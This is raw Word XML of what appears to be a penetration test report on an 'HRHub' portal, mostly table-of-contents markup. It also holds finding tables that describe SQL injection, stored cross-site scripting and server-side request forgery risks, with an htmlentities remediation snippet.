          <w:hyperlink w:anchor="_Toc71325123"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_Toc71325123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6CA3987F" w14:textId="02D55D9F" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325124"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_Toc71325124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5B1E3D57" w14:textId="3EEA5F7E" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325125" w:history="1">
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding 4 - Sensitive information transported in plain text via HTTP</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71325125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32242087" w14:textId="2DCD5ECB" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325126"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_Toc71325126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2F00A06E" w14:textId="4FBCFC0A" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325127"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_Toc71325127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46175714" w14:textId="2C145A76" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325128"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_Toc71325128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0874802C" w14:textId="27F75388" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325129"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_Toc71325129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7865CCA8" w14:textId="32E5A2D1" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325130"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_Toc71325130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74693D78" w14:textId="24CECFC2" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325131"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_Toc71325131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046808ED" w14:textId="334E3983" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325132"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_Toc71325132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262B27F8" w14:textId="0B986F2B" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325133" w:history="1">
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding 5 - SQL wi</w:t>
            </w:r>
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ld</w:t>
            </w:r>
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>card attack vulnerability present in the API for trainings</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71325133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60A90D97" w14:textId="4C737E41" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325134"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_Toc71325134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07B320C" w14:textId="311C9FE4" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325135"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_Toc71325135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213BC82F" w14:textId="43C73567" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325136"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_Toc71325136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0D7B740A" w14:textId="29AA8AFC" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325137"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_Toc71325137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41F699D" w14:textId="05E5E5A5" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325138"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_Toc71325138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4239EE6" w14:textId="5F3DF9D8" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325139"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_Toc71325139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7593C8D9" w14:textId="3F996286" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325140"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_Toc71325140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418D313B" w14:textId="64DA14D6" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325141" w:history="1">
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix I - Risk Matrix</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71325141 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60A67CC6" w14:textId="3FD3BA43" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325142" w:history="1">
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix 2 - Additional Information</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71325142 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E0D97B0" w14:textId="2A45FA80" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325143" w:history="1">
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Section 1 – SQL injection exploitation walkthrough</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71325143 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B049A0F" w14:textId="1A811A0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325099"/>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tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="070C7290" w14:textId="50AA17C7" w:rsidR="00C61E57" w:rsidRDefault="00C61E57">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>edium</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0267DA98"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6668EE">
              <w:t xml:space="preserve"> API</w:t>
            </w:r>
            <w:r w:rsidR="00C96D21">
              <w:t xml:space="preserve"> for traini</w:t>
            </w:r>
            <w:r w:rsidR="00FC201A">
              <w:t>ngs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09B98AAF" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0A18B8" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc71325100"/>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325101"/>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325102"/>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10534B35"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decreases.</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325103"/>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325104"/>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325105"/>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325106"/>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325107"/>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325108"/>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325109"/>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325110"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:bookmarkEnd w:id="13"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0252FD51" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="009716A7" w:rsidP="009A4F24">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009716A7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Stored cross-site scripting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> vulnerability presents in</w:t>
            </w:r>
            <w:r w:rsidR="0066781A">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> the </w:t>
            </w:r>
            <w:r w:rsidR="0066781A" w:rsidRPr="00670C47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>anonymous question functionality</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00940BCF">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Malicious us</w:t>
            </w:r>
            <w:r w:rsidR="003A6CE0">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>er</w:t>
            </w:r>
            <w:r w:rsidR="00940BCF">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> can inject arbitrary code into the database </w:t>
            </w:r>
            <w:r w:rsidR="0066781A">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>and when the code is triggered, unauthorised actions with elevated privileges could be performed on behalf the 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4930479A"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decreases.</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325111"/>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77777777"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entered as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malicious anonymous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282DBE42"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0E5ACE">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> since in this case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Pr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> [1].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325112"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:bookmarkEnd w:id="16"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A5091C3" w14:textId="0342961D" w:rsidR="007B5DA2" w:rsidRPr="0038184A"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from the server. This vulnerability </w:t>
            </w:r>
            <w:r w:rsidR="000A6C1C">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">threatens not only the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000A6C1C">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>HRHub</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000A6C1C">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> portal but also potentially any other systems on the server and the server itself. </w:t>
            </w:r>
            <w:r w:rsidR="00497F44">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>However, s</w:t>
            </w:r>
            <w:r w:rsidR="000A6C1C">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>ame as the SQL injection case, the attacker must already hold a set of valid credentials to exploit the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325113"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:bookmarkEnd w:id="17"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="75D3D44E" w14:textId="0EB80CE7"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 to be exploited by attackers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325114"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:bookmarkEnd w:id="18"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7D6BDD53" w14:textId="687B2738"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 xml:space="preserve">This vulnerability does not only affect the current system but also expose potential risks to the server. </w:t>
            </w:r>
            <w:r w:rsidR="00EC7F17">
              <w:t>Moreover, i</w:t>
            </w:r>
            <w:r w:rsidR="006C42E3">
              <w:t xml:space="preserve">t also provides critical information for </w:t>
            </w:r>
            <w:r w:rsidR="00A424BD">
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidR="00B04F50">
              <w:t>server-side request forgery vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="006C42E3">
              <w:t>.</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325115"/>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325116"/>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6C7A42C5" w14:textId="77777777" w:rsidR="00B10AD0" w:rsidRDefault="00EF0E63" w:rsidP="00EF0E63">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 xml:space="preserve">$question = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EF0E63">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>htmlentities</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EF0E63">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>($_POST["question"])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48FF6538" w14:textId="14DFBE3E" w:rsidR="000114DF" w:rsidRPr="00EF0E63" w:rsidRDefault="000114DF" w:rsidP="00EF0E63">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="100" w:left="220"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>// then display the question</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4799D576" w14:textId="7080AAF6" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc71325117"/>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325118"/>
